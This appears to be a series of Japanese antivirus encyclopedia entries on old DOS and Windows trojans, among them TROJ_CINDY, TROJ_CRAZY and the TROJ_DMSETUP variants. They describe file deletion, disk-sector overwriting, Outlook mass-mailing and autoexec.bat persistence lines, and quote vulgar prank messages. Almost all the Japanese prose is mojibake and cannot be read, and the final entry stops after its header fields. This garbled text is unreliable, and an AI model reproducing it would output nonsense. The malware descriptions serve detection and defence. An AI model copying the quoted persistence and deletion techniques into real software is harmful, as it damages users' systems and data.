TROJ_CINDY


̾¡¡¡¡¾Î:TROJ_CINDY

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:Dos Exec

¥¦¥¤¥ë¥¹¥µ¥¤¥º:151,552 bytes

¾Ü¡¡¡¡ºÙ:¤³¤Î¥È¥í¥¤¤ÎÌÚÇÏ·¿¥×¥í¥°¥é¥à¤ò¼Â¹Ô¤¹¤ë¤È¡¢
¼¡¤Î¥á¥Ã¥»¡¼¥¸¤¬É½¼¨¤µ¤ì¤ë¡£ ¡ÈExtracting File¡Ä¡Ä.¡É ¡Ê¥Õ¥¡¥¤¥ë¤òŸ³«¤·¤Æ¤¤¤Þ¤¹¡Ë ¤½¤Î´Ö¤Ë¥¦¥¤¥ë¥¹¤Ï¥Ï¡¼¥É¥Ç¥£¥¹¥¯Æâ¡ÊÆÃ¤ËC¥É¥é¥¤¥Ö¡Ë¤ò ¸¡º÷¤·¸«¤Ä¤«¤Ã¤¿¥Ç¥£¥ì¥¯¥È¥ê¤òÊÒ¤Ãü¤«¤éºï½ü¤·¤Æ¤·¤Þ ¤¦¡£¤³¤Îºî¶È¤Ë¤Ï DOS¤Î deltree ¥³¥Þ¥ó¥É¤òÍøÍѤ·¤Æ¤¤ ¤ë¡£deltree¥³¥Þ¥ó¥É¤¬»ÈÍѤǤ­¤Ê¤¤¤È¤­¤Ï¡¢DOS ¤Î¡Ö delete ¡×¥Õ¥¡¥ó¥¯¥·¥ç¥ó¤ò»ÈÍѤ¹¤ë¡£ ¼¡¤Ë¡¢IO.SYS, MSDOS.SYS, COMMAND.COM, AUTOEXEC.BAT¡¢ CONFIG.SYS ¤òºï½ü¤¹¤ë¡£¤³¤Î¤È¤­¤Ï¤³¤ì¤é¤Î¥Õ¥¡¥¤¥ë¤òºï ½ü¤¹¤ë¤È¤¤¤¦¥á¥Ã¥»¡¼¥¸¤òɽ¼¨¤¹¤ë¡£ ¤¹¤Ù¤Æ¤Îºî¶È¤¬½ªÎ»¤¹¤ë¤È¡¢¼¡¤Î¥á¥Ã¥»¡¼¥¸¤òɽ¼¨¤¹¤ë¡£ ¡ÈJob Has Been Done..... (Your Hard Disk Have Been Terminated..... Good Bye and Have a Bad Nightmre¡É ¤½¤·¤Æ¡¢¤³¤Î¥È¥í¥¤¤ÎÌÚÇϤò´Þ¤á¥Ï¡¼¥É¥Ç¥£¥¹¥¯Æâ¤Î¤¹¤Ù ¤Æ¤Î¥Õ¥¡¥¤¥ë¤¬¾Ã¤µ¤ì¤Æ¤·¤Þ¤¦¡£

TROJ_COOLGAME


̾¡¡¡¡¾Î:TROJ_COOLGAME

¸À¡¡¡¡¸ì:±Ñ¸ì

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

¥¦¥¤¥ë¥¹¥µ¥¤¥º:36,336 bytes

¾Ü¡¡¡¡ºÙ:¤³¤Î¥È¥í¥¤¤ÎÌÚÇϤϡ¢PC¥²¡¼¥à¤Î¤è¤¦¤Ê¤Õ¤ê¤ò
¤¹¤ë¤¬¡¢¼Â¤Ï¥²¡¼¥à¤Ç¤Ï¤Ê¤¤¡£¥×¥í¥°¥é¥à¤ò¼Â¹Ô¤¹¤ë¤È¥² ¡¼¥à¤Î¤è¤¦¤Ê¥¤¥ó¥¿¡¼¥Õ¥§¡¼¥¹¤¬É½¼¨¤µ¤ì¡¢¥á¥Ë¥å¡¼¤òÁª Âò¤¹¤ë¤è¤¦Â¥¤µ¤ì¤ë¡£¥æ¡¼¥¶¡¼¤¬¡ÖPlay¡×¤òÁªÂò¤¹¤ë¤È¡¢
¡ÈVIRUS UPLOADED¡É ¤È¤¤¤¦¥á¥Ã¥»¡¼¥¸¤¬É½¼¨¤µ¤ì¡¢C:\
WINDOWS¥Ç¥£¥ì¥¯¥È¥êÆâ¤Î°Ê²¼¤Î¥×¥í¥°¥é¥à¤ò¼Â¹Ô¤¹¤ë¡£
C:\WINDOWS\WINVER.EXE

C:\WINDOWS\WINPOPUP.EXE

C:\WINDOWS\WINMINE.EXE

C:\WINDOWS\WINIPCFG.EXE

C:\WINDOWS\WINHLP32.EXE

C:\WINDOWS\WINHELP.EXE

C:\WINDOWS\WINFILE.EXE

C:\WINDOWS\WELCOME.EXE

C:\WINDOWS\WAB.EXE

C:\WINDOWS\VIEWER.EXE

C:\WINDOWS\UNINST.EXE

C:\WINDOWS\URGENT.EXE

C:\WINDOWS\TOUR.EXE

C:\WINDOWS\TELNET.EXE

C:\WINDOWS\TASKMAN.EXE

C:\WINDOWS\SYSMON.EXE

C:\WINDOWS\SOL.EXE

C:\WINDOWS\SNDVOL32.EXE

C:\WINDOWS\SNDREC32.EXE

C:\WINDOWS\SCANDSKW

C:\WINDOWS\RSRCMTR.EXE

C:\WINDOWS\REGEDIT.EXE

C:\WINDOWS\PROGMAN.EXE

C:\WINDOWS\PLAYER.EXE

C:\WINDOWS\PBRUSH.EXE

C:\WINDOWS\PACKAGER.EXE

C:\WINDOWS\NOTEPAD.EXE

C:\WINDOWS\NETH.EXE

C:\WINDOWS\NET.EXE

C:\WINDOWS\MSHEARTS.EXE

C:\WINDOWS\MPLAYER.EXE

C:\WINDOWS\GRPCONV.EXE

C:\WINDOWS\FREECELL.EXE

C:\WINDOWS\FILEXFER.EXE

C:\WINDOWS\FAXVIEW.EXE

C:\WINDOWS\FAXCOVER.EXE

C:\WINDOWS\EXPLORER.EXE

C:\WINDOWS\DRVSPACE.EXE

C:\WINDOWS\DIRECTCC.EXE

C:\WINDOWS\DIALER.EXE

C:\WINDOWS\DEFRAG.EXE

C:\WINDOWS\CHARMAP.EXE

C:\WINDOWS\CDPLAYER.EXE

C:\WINDOWS\CALC.EXE
¤³¤ì¤é¤Î¥×¥í¥°¥é¥à¤ò°ìÅ٤˼¹Ԥ¹¤ë¤¿¤á¡¢¥ê¥½¡¼¥¹ÉÔ­ ¤Ë´Ù¤Ã¤¿¥Þ¥·¥ó¤Ï·ë²ÌŪ¤Ë¥Ï¥ó¥°¥¢¥Ã¥×¤¹¤ë¤³¤È¤Ë¤Ê¤ë¡£
È÷¡¡¡¡¹Í:¤³¤Î¥È¥í¥¤¤ÎÌÚÇϤˤè¤ë¤½¤Î¾¤ÎÇ˲õ³èư¤Ï¤Ê
¤¤¡£

TROJ_CORRUPTER


̾¡¡¡¡¾Î:TROJ_CORRUPTER

¸À¡¡¡¡¸ì:English

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:Windows/DOS

¥¦¥¤¥ë¥¹¥µ¥¤¥º:32768¥Ð¥¤¥È

¾Ü¡¡¡¡ºÙ:¼Â¹Ô¤·¤¿¤é¡¢¼¡¤Î¥á¥Ã¥»¡¼¥¸¤òɽ¼¨¤¹¤ë¡£

Fata Error: Hard Disk Files Couuputed I/O
Subsystemdamaged!
¤½¤·¤Æ¡¢C¥É¥é¥¤¥Ö¤ÎAutoexec.bat, Config.sys¤ÈC:\
Windows¥Ç¥£¥ì¥¯¥È¥ê¤Îsystem.ini, win.ini¤òºï½ü¤¹¤ë¡£ ºÆµ¯Æ°¤¹¤ë¤È¡¢Windows¤¬µ¯Æ°¤Ç¤­¤Ê¤¯¤Ê¤ë¡£

TROJ_CRAZY


̾¡¡¡¡¾Î:TROJ_CRAZY

ÊÌ¡¡¡¡Ì¾:W32.Badass.24576, I-worm.BadAss

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿,¥ï¡¼¥à

¾Ü¡¡¡¡ºÙ:¤³¤ì¤Ïͭ̾¤ÊW97M_MELISSA¥¦¥¤¥ë¥¹Ê¤ÎÁý¿£ÎÏ
¤òÍ­¤¹¤ë¥ï¡¼¥à¤Ç¡¢Visual Basic6¤Çµ­½Ò¤µ¤ì¤¿Windows ·¿ ¼Â¹Ô¥×¥í¥°¥é¥à¤Ç¤¹¡£¤³¤Î¤¿¤á¡¢¼Â¹Ô¤¹¤ë¤Ë¤ÏVB6¥é¥ó¥¿¥¤ ¥à¥é¥¤¥Ö¥é¥ê¤Ç¤¢¤ëMSVBVM60.DLL¤¬É¬ÍפǤ¹¡£ TROJ_CRAZY¤Î»ÈÍѤ·¤Æ¤¤¤ë¥³¡¼¥É¤Ï¡¢W97M_MELISSA¤Î»ÈÍÑ ¤·¤¿¼êË¡¤ÈÈó¾ï¤Ë¤è¤¯»÷¤Æ¤¤¤Þ¤¹¡£¤ª¤½¤é¤¯Melissa¤ò»²¹Í ¤ËºîÀ®¤µ¤ì¤¿¤Î¤Ç¤·¤ç¤¦¡£ TROJ_CRAZY¤ÏMicrosoft Outlook¤òÍøÍѤ·¤Æ¡¢¥¢¥É¥ì¥¹Ä¢¤Ë ÅÐÏ¿¤µ¤ì¤¿¤¹¤Ù¤Æ¤Î¥á¡¼¥ë¥¢¥É¥ì¥¹¤ËÂФ·¤Æ¡¢²¼µ­¤Î¤è¤¦ ¤Ê¥á¡¼¥ë¤ò¼«Æ°Åª¤ËÁ÷¿®¤·¤Þ¤¹¡£
·ï̾ :=?Windows-1252?B?TW9n+2guLg==?=

ËÜʸ :Dit is wel grappig! :-)
¡Ê¤³¤¤¤Ä¤Ï¤Û¤ó¤È¤Ë¤¹¤´¤¤¤¼¡ª¤È¤¤¤¦°ÕÌ£¤Î¥ª¥é¥ó¥À¸ì¡Ë
źÉÕ¥Õ¥¡¥¤¥ë:BADASS.EXE
¤³¤ÎBADASS.EXE ¤ò¼Â¹Ô¤¹¤ë¤È¡¢¤Þ¤º°Ê²¼¤Î¤è¤¦¤Ê¥á¥Ã¥» ¡¼¥¸¤òɽ¼¨¤·¤Þ¤¹¡£ Kernel32 An error has occured probably because your cunt smells bad. Is this really so? [ Yes ] [ No ] ¥æ¡¼¥¶¡¼¤¬[ No ]¤òÁªÂò¤·¤è¤¦¤È¤·¤Æ¤â¡¢[ No ]¤Î¥Ü¥¿¥ó ¤Ï¥Þ¥¦¥¹¥«¡¼¥½¥ë¤«¤éƨ¤²¤ë¤è¤¦¤ËÈ¿ÂЦ¤Ë°Üư¤·¡¢²¡¤¹ ¤³¤È¤¬¤Ç¤­¤Þ¤»¤ó¡£¤½¤³¤Ç¥æ¡¼¥¶¡¼¤Ï[ Yes ]¤òÁªÂò¤¹¤ë¤Û ¤«¤¢¤ê¤Þ¤»¤ó¡£ ¤ò²¡¤¹¤È¡¢°Ê²¼¤Î¥á¥Ã¥»¡¼¥¸¤òɽ¼¨¤·¤Þ¤¹¡£ WIN32 Contact your local supermarket for toiletpaper and soap to solve this problem. [ OK ] ¤³¤Î¥ï¡¼¥à¤Ï°ìÅ٥᡼¥ë¤òÁ÷¿®¤·¤¿¤¢¤È¡¢°Ê²¼¤Î¥ì¥¸¥¹¥È ¥ê¥¨¥ó¥È¥ê¤ËÃͤòÄɲä·¤Þ¤¹¡£¤³¤ÎÃͤ¬Â¸ºß¤¹¤ë¥Þ¥·¥ó¤« ¤é¡¢ºÆ¤Ó¥á¡¼¥ë¤òÁ÷¤ë¤³¤È¤Ï¤¢¤ê¤Þ¤»¤ó¡£ HKCU\SoftWare\VB and VBA Program Seettings\Windows\ CurrentVersion ÃÍ "CMCTL32"="00 00 00 01"

TROJ_DARKVOID


̾¡¡¡¡¾Î:TROJ_DARKVOID

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:DOS¡ÊExe¡Ë

¥¦¥¤¥ë¥¹¥µ¥¤¥º:10 Kb

¾Ü¡¡¡¡ºÙ:¤³¤ì¤Ï16bit¥×¥í¥°¥é¥à¤È¤·¤ÆºîÀ®¤µ¤ì¤¿¥È¥í¥¤
¤ÎÌÚÇϤǤ¢¤ë¡£´¶À÷¤Ï¤·¤Ê¤¤¡£ ¤³¤Î¥×¥í¥°¥é¥à¤ò¼Â¹Ô¤¹¤ë¤È°Ê²¼¤Î¥á¥Ã¥»¡¼¥¸¤òɽ¼¨¤¹ ¤ë¡£ Follow the world into the VoiD My VoiD The DarkVoiD ¤½¤Î¸å¡¢Ä̾ï¤Î¥³¥Þ¥ó¥É²èÌ̤ËÌá¤ë¡£¥æ¡¼¥¶¡¼¤¬¼¡¤Ë²¿¤« ¥­¡¼ÆþÎϤò¤¹¤ë¤È¡¢¥È¥í¥¤¤ÎÌÚÇϤÎÇ˲õ³èư¤¬¼Â¹Ô¤µ¤ì¡¢ ¥Ï¡¼¥É¥Ç¥£¥¹¥¯¤ÎºÇ½é¤Î¿ô¥»¥¯¥¿¡¼¤ò¤Ç¤¿¤é¤á¤Ê¾ðÊó¤Ç¾å ½ñ¤­¤·¤Æ¤·¤Þ¤¦¡£ ¤Þ¤¿¡¢¥È¥í¥¤¤ÎÌÚÇϤ¬¤¹¤Ç¤Ëȯɤ·¤¿¸å¤Ë²¿¤«¥­¡¼ÆþÎϤò ¹Ô¤¦¤È¡¢¡ÈSeek error¡É¤È¤¤¤¦¥á¥Ã¥»¡¼¥¸¤òɽ¼¨¤¹¤ë¡£

TROJ_DIRKILLER


̾¡¡¡¡¾Î:TROJ_DIRKILLER

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:.EXE¡ÊDOS¡Ë

¥¦¥¤¥ë¥¹¥µ¥¤¥º:153,254 bytes

¾Ü¡¡¡¡ºÙ:¤³¤ì¤Ï¥È¥í¥¤¤ÎÌÚÇÏ·¿ÉÔÀµ¥×¥í¥°¥é¥à¤Ç¤¢¤ë¡£
´¶À÷³èưÅù¤Ï¤Ê¤¤¡£ ¥Õ¥¡¥¤¥ë¤ò¼Â¹Ô¤¹¤ë¤È¡¢¥Ï¡¼¥É¥Ç¥£¥¹¥¯¤Î¥ë¡¼¥È¥Ç¥£¥ì¥¯ ¥È¥ê¤Ë¡ÉS1.O¡É¤È¤¤¤¦¥Õ¥¡¥¤¥ë¤òºîÀ®¤¹¤ë¡£¤³¤Î¥Õ¥¡¥¤¥ë ¤Î¥µ¥¤¥º¤Ï0¥Ð¥¤¥È¤Ç¤¢¤ë¡£ ¤µ¤é¤Ë¡¢¥Ï¡¼¥É¥Ç¥£¥¹¥¯¤Î14 sector¾å¤Ë¤¢¤ë¥Ç¡¼¥¿¤ò¾å½ñ ¤­¤·¤Æ¤·¤Þ¤¦¡£

TROJ_DIRTYGUY


̾¡¡¡¡¾Î:TROJ_DIRTYGUY

ÊÌ¡¡¡¡Ì¾:TROJAN.DIRTYGUY

¸À¡¡¡¡¸ì:¥É¥¤¥Ä¸ì

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:DOS

¥¦¥¤¥ë¥¹¥µ¥¤¥º:4,112¥Ð¥¤¥È

¾Ü¡¡¡¡ºÙ:¥æ¡¼¥¶¤¬ÉÔÃí°Õ¤Ë¥¦¥¤¥ë¥¹¤ò´Þ¤à¥Õ¥¡¥¤¥ë¤ò¼Â
¹Ô¤·¤Æ¤·¤Þ¤¦¤È¡¤°Ê²¼¤Î¥á¥Ã¥»¡¼¥¸¤¬É½¼¨¤µ¤ì¤ë¡£ ¡ÈAls u begeerlijke dames wilt zien, druk dan snel op ¡É ( Íç¤Î½÷À­¤ò¸«¤¿¤¤Êý¤Ï¥­¡¼¤ò²¡¤·¤Æ¤¯¤À¤µ¤¤¡£ ) ¥æ¡¼¥¶¤¬¡¤¥­¡¼¤ò²¡¤¹¤È¡¢¥Î¥¤¥º¤¬ÌĤꡢ¼¡¤Î¥á¥Ã ¥»¡¼¥¸¤¬É½¼¨¤µ¤ì¤ë¡£ ¡ÈAan deze computer zit een viezerik te werken !!!!! ¡É (¤Ê¤ó¤Æ¤¤¤ä¤é¤·¤¤Åۤʤó¤À!!!!) ¤½¤Î¸å¡¢¥·¥¹¥Æ¥à¤¬Ää»ß¤¹¤ë¡£
È÷¡¡¡¡¹Í:¤³¤Î¥×¥í¥°¥é¥à¤Ï¡¤Borland¼Ò¤Î C/C++¤â¤·¤¯¤Ï
Object Pascal(Delphi)¤È¤¤¤¦¡¢¹âÅù¸À¸ì¤ò»È¤Ã¤Æµ­½Ò¤µ¤ì ¤Æ¤¤¤ë¡£

TROJ_DISK_NUKE


̾¡¡¡¡¾Î:TROJ_DISK_NUKE

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:¤Ê¤·

¥¦¥¤¥ë¥¹¥µ¥¤¥º:15435 bytes

ȯ¾ÍÃÏ:ÉÔÌÀ

ȯ¸«Æü:1992

¾Ü¡¡¡¡ºÙ:¤³¤ì¤ÏC¸À¸ì¤Ç¤«¤«¤ì¤¿¥È¥í¥¤¤ÎÌÚÇÏ·¿Ç˲õ¥×¥í
¥°¥é¥à¤Ç¤¢¤ëŽ¡ -¡¡¤³¤Î¥×¥í¥°¥é¥à¤ò¼Â¹Ô¤¹¤ë¤ÈޤޢA¥É¥é¥¤¥Ö¤ò"nuke"(³Ë¹¶ ·â)¤·¤Æ¤â¤è¤¤¤«Ž£¤È¥æ¡¼¥¶¡¼¤Ë¿Ò¤Í¤ë¥×¥í¥ó¥×¥È¤òɽ¼¨¤¹ ¤ëŽ¡¥æ¡¼¥¶¡¼¤¬¤É¤ÎÁªÂò¤ò¤·¤è¤¦¤È¤âޤÇ˲õ³èư¤¬³«»Ï¤µ¤ì ¤ëŽ¡
»³²:
-¡¡A¥É¥é¥¤¥Ö¤¬¥Õ¥©¡¼¥Þ¥Ã¥È¤µ¤ì¤ëŽ¡

TROJ_DMSETUP.A


̾¡¡¡¡¾Î:TROJ_DMSETUP.A

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:DOS

¥¦¥¤¥ë¥¹¥µ¥¤¥º:47,854 bytes

¾Ü¡¡¡¡ºÙ:¤³¤Î¥×¥í¥°¥é¥à¤ò¼Â¹Ô¤¹¤ë¤È¡¢¤Þ¤º¥á¥Ã¥»¡¼¥¸

¤¬É½¼¨¤µ¤ì¤Þ¤¹¡£:
¡Èpress a key.¡É ¤³¤³¤Ç¥æ¡¼¥¶¡¼¤¬¥­¡¼¤ò²¡¤¹¤È¡¢¤µ¤Þ¤¶¤Þ¤Ê¿§¤ò¤·¤¿±ß·Á ¤Î²èÁü¤¬¤¤¤¯¤Ä¤«É½¼¨¤µ¤ì¤Þ¤¹¡£¤â¤¦°ìÅÙ¥­¡¼¤ò²¡¤¹¤È¡¢ ¥×¥í¥°¥é¥à¤Ï¥·¥¹¥Æ¥à¡¦¥â¥Ë¥¿¡¼¤Î²òÁüÅÙ¤ò EGA / CGA ¥â¡¼¥É¤ËÊѹ¹¤·¤Æ¡¢½ªÎ»¤·¤Þ¤¹¡£ ¤Þ¤¿¡¢DM2IYF¡¢SUCK IT¤È¤¤¤¦Ì¾¾Î¤Î£²¤Ä¤Î¥Ç¥£¥ì¥¯¥È¥ê¤ò ¥«¥ì¥ó¥È¥Ç¥£¥ì¥¯¥È¥ê¤ÎÃæ¤ËºîÀ®¤·¤Þ¤¹¡£¤½¤·¤Æ¥ë¡¼¥È¥Ç ¥£¥ì¥¯¥È¥ê¡¢ DOS ¥Ç¥£¥ì¥¯¥È¥ê¡¢¤½¤·¤Æ SUCK IT ¥Ç¥£¥ì ¥¯¥È¥ê¤ÎÃæ¤Ë¥È¥í¥¤¤ÎÌÚÇϼ«¿È¤Î¥³¥Ô¡¼¤òºîÀ®¤·¤Þ¤¹¡£ ¤½¤·¤Æ¡¢AUTOEXEC.BAT¥Õ¥¡¥¤¥ë¤Ë¡Èsexgod –inauto ¡É¤È¤¤¤¦¥³¥Þ¥ó¥É¤òÄɲ䷤ơ¢µ¯Æ°»þ¤ËËè²ó¤³¤Î¥È¥í¥¤¤Î ÌÚÇϤ¬¼Â¹Ô¤µ¤ì¤ë¤è¤¦¤ËÀßÄꤷ¤Þ¤¹¡£
È÷¡¡¡¡¹Í:¤³¤ì¤Ï¥È¥í¥¤¤ÎÌÚÇÏ·¿ÉÔÀµ¥×¥í¥°¥é¥à¤Ç¤¹¡£¤¤
¤«¤Ê¤ë¥Õ¥¡¥¤¥ë¤Ë¤â´¶À÷¤¹¤ë¤³¤È¤Ï¤¢¤ê¤Þ¤»¤ó¡£¥·¥¹¥Æ¥à ¤«¤é½üµî¤¹¤ë¤Ë¤Ï¸¡½Ð¤µ¤ì¤¿¥Õ¥¡¥¤¥ë¤òºï½ü¤·¤Æ¤¯¤À¤µ ¤¤¡£

TROJ_DMSETUP.C


̾¡¡¡¡¾Î:TROJ_DMSETUP.C

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

¥¦¥¤¥ë¥¹¥µ¥¤¥º:47,854¥Ð¥¤¥È

¾Ü¡¡¡¡ºÙ:DOS¥Õ¥¡¥¤¥ë¤Ë´¶À÷¤¹¤ë¥¦¥¤¥ë¥¹.¥¦¥¤¥ë¥¹¤¬¼Â
¹Ô¤µ¤ì¤ë¤È¡¢¡Èpress a key¡É¡Ê²¿¤«¥­¡¼¤ò²¡¤·¤Æ¤¯¤À¤µ ¤¤¡Ë¤È¤¤¤¦¥á¥Ã¥»¡¼¥¸¤¬É½¼¨¤µ¤ì¤ë¡£¥­¡¼ÆþÎϤ¬¤¢¤ë¤È¡¢ ¤µ¤Þ¤¶¤Þ¤Ê¿§¤Î¥°¥é¥Õ¥£¥Ã¥¯Ž¥¥¤¥á¡¼¥¸¤¬¤¤¤¯¤Ä¤â²èÌ̤Ëɽ ¤ï¤ì¡¢¤â¤¦°ìÅÙ¥­¡¼ÆþÎϤ¬¤¢¤ë¤È¡¢¥·¥¹¥Æ¥à¤Î¥â¥Ë¥¿ÀßÄê ¤òEGA/CGA¥â¡¼¥É¤Ë¤·¤¿¤Þ¤Þ¡¢¥°¥é¥Õ¥£¥Ã¥¯¤¬½ªÎ»¤¹¤ë¡£ ¤Þ¤¿¡¢¡ÇDM21YF¡Ç¤È¡ÇSUCK IT¡Ç¤È¤¤¤¦£²¤Ä¤Î¥Ç¥£¥ì¥¯¥È¥ê ¤ò¥«¥ì¥ó¥ÈŽ¥¥Ç¥£¥ì¥¯¥È¥ê¤ËºîÀ®¤¹¤ë¡£¤½¤·¤Æ¡¢¤¹¤Ù¤Æ¤Î¥ë ¡¼¥ÈŽ¥¥Ç¥£¥ì¥¯¥È¥ê¤È¥µ¥ÖŽ¥¥Ç¥£¥ì¥¯¥È¥ê¤Ë¥¦¥¤¥ë¥¹¥³¡¼¥É ¤ò¥³¥Ô¡¼¤¹¤ë¡£ autoexec.bat¤ÎÆâÍÆ¤òÊѹ¹¤·¡¢¡ÈICQLOVE –inauto¡É ¤È½ñ¤­²Ã¤¨¤ë¤³¤È¤Ç¡¢Windows¤¬µ¯Æ°¤¹¤ë¤¿¤Ó¤Ë¡¢¥¦¥¤¥ë¥¹ ¤¬¼Â¹Ô¤µ¤ì¤ë¤è¤¦¤Ë¤¹¤ë¡£

TROJ_DMSETUP.F


̾¡¡¡¡¾Î:TROJ_DMSETUP.F

ÊÌ¡¡¡¡Ì¾:HLLO_DMSETUP.Fޤ WORM.DMSETUP.F

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:¤Ê¤·

¥¦¥¤¥ë¥¹¥µ¥¤¥º:81ޤ560 bytes

ȯ¾ÍÃÏ:ÉÔÌÀ

ȯ¸«Æü:ÉÔÌÀ

¾Ü¡¡¡¡ºÙ:-¡¡¥Õ¥¡¥¤¥ë¤ò¼Â¹Ô¤¹¤ë¤È¡¢¡Ö¡ÈPress a key¡É
(²¿¤«¥­¡¼¤òÆþÎϤ»¤è)¡×¤È¥×¥í¥ó¥×¥È¤¬É½¼¨¤µ¤ì¤ë¡£¥­ ¡¼¤òÆþÎϤ¹¤ë¤È¡¢±ß¤Î¥³¥é¡¼¥¸¥å¤Ë¤è¤ë¥°¥é¥Õ¥£¥Ã¥¯¤¬¡¢ ¥¹ ¥¯¥í¡¼¥ë¤·¤Ê¤¬¤é¸½¤ì¤ë¡£¤³¤³¤ÇºÆ¤Ó¥­¡¼ÆþÎϤò¤¹¤ë¤È¡¢
°Ê²¼¤Î¤è¤¦¤Êµ¶¤Î¥¨¥é¡¼¤¬É½¼¨¤µ¤ì¤ë:

START UP ERROR: Can not find vital data!
Attempting to safe close down (This may take several minuets ......) ¤³¤Î¤¢¤ÈŤ¤´Ö¥é¥ó¥¿¥¤¥à¥¨¥é¡¼¥á¥Ã¥»¡¼¥¸¤¬É½¼¨¤µ¤ìޤ¤½ ¤Î´Ö¤Ë¥Ï¡¼¥É¥Ç¥£¥¹¥¯¤Ë°ÕÌ£¤Î¤Ê¤¤Ì¾Á°¤ÎÉÕ¤¤¤¿¥Ç¥£¥ì¥¯ ¥È¥ê¤¬Ìµ¿ô¤ËºîÀ®¤µ¤ì¤ëŽ¡ -¡¡¤³¤Î¥¦¥¤¥ë¥¹¤Î¥ª¥ê¥¸¥Ê¥ë¥Õ¥¡¥¤¥ë¤¬¥Ï¡¼¥É¥Ç¥£¥¹¥¯¤Î ¥ë¡¼¥È¥Ç¥£¥ì¥¯¥È¥ê¤Ë¥³¥Ô¡¼¤µ¤ì¤ë¤¬Ž¤¤½¤Î¥Õ¥¡¥¤¥ë̾¤Ï´¶ À÷¤ÎÅ٤˥é¥ó¥À¥à¤ËÊѹ¹¤µ¤ì¤ëŽ¡Î㤨¤Ð°Ê²¼¤Î¤è¤¦¤Ê̾Á° ¤Ç¤¢¤ëŽ¡ SEXYBUNY.EXEޤ BUNYTOE.EXEޤ...etc ¡¡¤Þ¤¿Ž¤TAGED.LMRޤ FIX.NII ޤ NI.CFG¤È¤¤¤¦¥Õ¥¡¥¤¥ë¤òºî À®¤¹¤ëŽ¡ ¤µ¤é¤Ë¡¢¥Ö¡¼¥È¥¢¥Ã¥×»þ¤ËËè²ó¼Â¹Ô¤µ¤ì¤ë¤è¤¦¤Ëautoexec. bat¤ò½ñ¤­´¹¤¨¤ë¡£¤³¤ì¤Ë¤è¤Ã¤Æ°Ê²¼¤Î»³²¤òµÚ¤Ü¤¹Ž¡ ¡¡ »³² - ¥Ö¡¼¥È¥¢¥Ã¥×»þ¡¢Ëè²ó¥Ï¡¼¥É¥Ç¥£¥¹¥¯¾å¤Ë¡¢°ÕÌ£¤Î¤Ê¤¤ ̾Á°¤ò»ý¤Ã¤¿Ìµ¿ô¤Î¥Ç¥£¥ì¥¯¥È¥ê¤òºîÀ®¤¹¤ë¡£
È÷¡¡¡¡¹Í:ºîÀ®¤µ¤ì¤¿¥Ç¥£¥ì¥¯¥È¥ê¤Ïޤ¥Ç¥£¥ì¥¯¥È¥ê̾¤ËÆÃ
Ê̤ÊASCII¥³¡¼¥É¤ò»È¤Ã¤Æ¤¤¤ë¤¿¤áޤDOS¾å¤«¤éºï½ü¤¹¤ë¤³¤È ¤Ï¤Ç¤­¤Ê¤¤Ž¡

TROJ_DMSETUP.G


̾¡¡¡¡¾Î:TROJ_DMSETUP.G

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:¤Ê¤·

¥¦¥¤¥ë¥¹¥µ¥¤¥º:N/A

ȯ¾ÍÃÏ:ÉÔÌÀ

ȯ¸«Æü:ÉÔÌÀ

¾Ü¡¡¡¡ºÙ:-¡¡¥Õ¥¡¥¤¥ë¤ò¼Â¹Ô¤¹¤ë¤È¡¢¡Ö²¿¤«¥­¡¼¤òÆþÎϤ»
¤è¡×¤È¥×¥í¥ó¥×¥È¤¬É½¼¨¤µ¤ì¤ë¡£¥­¡¼¤òÆþÎϤ¹¤ë¤È¡¢±ß¤Î ¥³¥é¡¼¥¸¥å¤Ë¤è¤ë¥°¥é¥Õ¥£¥Ã¥¯¤¬¡¢¥¹¥¯¥í¡¼¥ë¤·¤Ê¤¬¤é¸½ ¤ì¤ë¡£¤³¤³¤Ç ºÆ¤Ó¥­¡¼ÆþÎϤò¤¹¤ë¤È¡¢°Ê²¼¤Î¤è¤¦¤Êµ¶¤Î¥¨¥é¡¼¤¬É½¼¨¤µ
¤ì¤ë:

START UP ERROR: Can not find vital data!
Attempting to safe close down (This may take several minuets ......) 25% ..................> ¡¡¤½¤·¤Æ¡¢¥Ö¡¼¥È¥¢¥Ã¥×»þ¤ËËè²ó¼Â¹Ô¤µ¤ì¤ë¤è¤¦¤Ë" BUNYYES-inauto"¤È¤¤¤¦°ìʸ¤ò¡¢autoexec.bat¤ËÄɲ乤롣 ¤³¤ì¤Ë¤è¤Ã¤Æ°Ê²¼¤Î»³²¤òµÚ¤Ü ¤¹Ž¡ ¡¡ »³² - ¥Ö¡¼¥È¥¢¥Ã¥×»þ¡¢¥Ï¡¼¥É¥Ç¥£¥¹¥¯¾å¤Ë¡¢°ÕÌ£¤Î¤Ê¤¤Ì¾Á° ¤ò»ý¤Ã¤¿Ìµ¿ô¤Î¥Ç¥£¥ì¥¯¥È¥ê¤òºîÀ®¤¹¤ë¡£

TROJ_DMSETUP.V2


̾¡¡¡¡¾Î:TROJ_DMSETUP.V2

ÊÌ¡¡¡¡Ì¾:TROJ_DMSETUP.D

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:¤Ê¤·

¥¦¥¤¥ë¥¹¥µ¥¤¥º:N/A

ȯ¾ÍÃÏ:ÉÔÌÀ

ȯ¸«Æü:ÉÔÌÀ

